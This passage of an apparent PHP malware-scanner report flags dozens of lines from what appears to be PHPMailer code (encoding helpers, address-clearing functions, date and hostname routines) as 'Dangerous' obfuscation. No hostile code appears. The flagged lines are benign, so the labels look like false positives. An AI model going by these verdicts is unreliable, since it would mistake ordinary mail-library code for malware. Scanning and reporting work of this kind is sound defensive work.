</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3126</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">has8bitChars</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3128</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/[\x80-\xFF]/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3134</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">by paravoid</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3135</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">mb</span><span style="color: #007700">-</span><span style="color: #0000BB">encode</span><span style="color: #007700">-</span><span style="color: #0000BB">mimeheader</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#60283</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">base64EncodeWrapMB</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$linebreak </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3181</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">quoted</span><span style="color: #007700">-</span><span style="color: #0000BB">printable</span><span style="color: #007700">-</span><span style="color: #0000BB">decode</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#89417 Adapted from this comment</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3183</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQP</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$line_max </span><span style="color: #007700">= </span><span style="color: #0000BB">76</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3185</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function if </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s available (>= PHP5.3)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3186</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'quoted_printable_encode'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3187</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">quoted_printable_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3195</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'/[^\r\n]{' </span><span style="color: #007700">. (</span><span style="color: #0000BB">$line_max </span><span style="color: #007700">- </span><span style="color: #0000BB">3</span><span style="color: #007700">) . </span><span style="color: #DD0000">'}[^=\r\n]{2}/'</span><span style="color: #007700">, </span><span style="color: #DD0000">"$0=\r\n"</span><span style="color: #007700">, </span><span style="color: #0000BB">$string</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that was removed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3208</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQPphp</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3213</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">encodeQP</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$line_max</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3224</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQ</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$position </span><span style="color: #007700">= </span><span style="color: #DD0000">'text'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3261</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">' '</span><span style="color: #007700">, </span><span style="color: #DD0000">'_'</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoded</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3275</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addStringAttachment</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafClear</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">,</span><span style="color: #0000BB">$email</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3314</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True on successfully adding an attachment</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3316</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addEmbeddedImage</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$cid</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$disposition </span><span style="color: #007700">= </span><span style="color: #DD0000">'inline'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3361</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addStringEmbeddedImage</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 338</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return-</span><span style="color: #0000BB">Path</span><span style="color: #007700">) </span><span style="color: #0000BB">of the message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3393</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">inlineImageExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3407</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">attachmentExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3421</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">alternativeExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3423</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !empty(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">AltBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3432</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearQueuedAddresses</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3446</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3459</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearCCs</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 345</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return-</span><span style="color: #0000BB">Path of the message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3472</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearBCCs</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3485</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearReplyTos</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 348</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">path header</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3495</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAllRecipients</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAttachments</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3517</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearCustomHeaders</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3528</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setError</span><span style="color: #007700">(</span><span style="color: #0000BB">$msg</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 352</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ReturnPath </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3550</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">an RFC 822 formatted date</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3555</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">rfcDate</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3560</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">date</span><span style="color: #007700">(</span><span style="color: #DD0000">'D, j M Y H:i:s O'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3565</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns </span><span style="color: #DD0000">'localhost.localdomain' </span><span style="color: #007700">if </span><span style="color: #0000BB">unknown</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3569</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">serverHostname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3576</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'gethostname'</span><span style="color: #007700">) && </span><span style="color: #0000BB">gethostname</span><span style="color: #007700">() !== </span><span style="color: #0000BB">false</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3590</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">lang</span><span style="color: #007700">(</span><span style="color: #0000BB">$key</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3601</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">[</span><span style="color: #0000BB">$key</span><span style="color: #007700">] . </span><span style="color: #DD0000">' https://github.com/PHPMailer/PHPMailer/wiki/Troubleshooting'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3603</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">[</span><span style="color: #0000BB">$key</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3605</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the key </span><span style="color: #007700">as </span><span style="color: #0000BB">a fallback</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3606</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$key</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3613</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True </span><span style="color: #007700">if </span><span style="color: #0000BB">an error did occur</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3615</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isError</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3617</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">error_count </span><span style="color: #007700">> </span><span style="color: #0000BB">0</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3627</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fixEOL</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3635</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$nstr</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3647</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addCustomHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3658</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns all custom headers</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3661</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
